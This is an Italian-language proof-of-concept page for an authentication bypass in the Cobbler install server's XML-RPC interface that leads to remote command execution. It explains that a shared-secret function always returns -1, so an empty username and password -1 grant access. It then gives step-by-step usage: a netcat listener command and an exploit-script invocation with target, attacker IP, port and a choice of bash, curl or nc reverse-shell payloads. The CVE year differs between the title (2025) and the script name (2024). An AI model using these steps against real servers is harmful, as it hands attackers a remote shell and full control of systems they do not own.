
PoC di CVE-2025-47533 Clobber RCE
Cobbler, un server di installazione Linux che consente la configurazione rapida di ambienti di installazione di rete, presenta una vulnerabilità di autenticazione nelle versioni dalla 3.0.0 fino alla (esclusa) 3.2.3 e 3.3.7. La funzione utils.get_shared_secret() restituisce sempre -1, consentendo a chiunque di connettersi all'interfaccia XML-RPC di Cobbler con un nome utente vuoto ('') e password -1. Ciò permette a un attaccante con accesso di rete di ottenere il controllo completo del server Cobbler. La vulnerabilità è corretta nelle versioni 3.2.3 e 3.3.7.
La vulnerabilità è causata da una gestione impropria del segreto condiviso nella funzione utils.get_shared_secret(), che restituisce sempre -1, bypassando di fatto l'autenticazione. Ciò consente a qualsiasi utente di rete di connettersi all'interfaccia XMLRPC di Cobbler con credenziali vuote ed eseguire comandi arbitrari.
http://<target>:25151/ — Endpoint API XMLRPC di Cobbler
Lo script exploit supporta vari payload di reverse shell tra cui:
nc)Avvia un listener Netcat sulla tua macchina:
nc -lvnp 4444
Esegui lo script exploit CVE-2024-47533.py.
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : Target (Esempio: -t http://1<IP_SERVICE>:<PORT>)
-l: IP Locale (Esempio: -l 10.10.11.80)
-p : Porta <LOCAL_PORT> (Esempio: -p 4444)
--payload: Payload (bash, curl, nc) (Esempio: --payload bash)
In caso di esecuzione riuscita, la reverse shell si riconnetterà al listener, concedendo all'attaccante accesso remoto al server.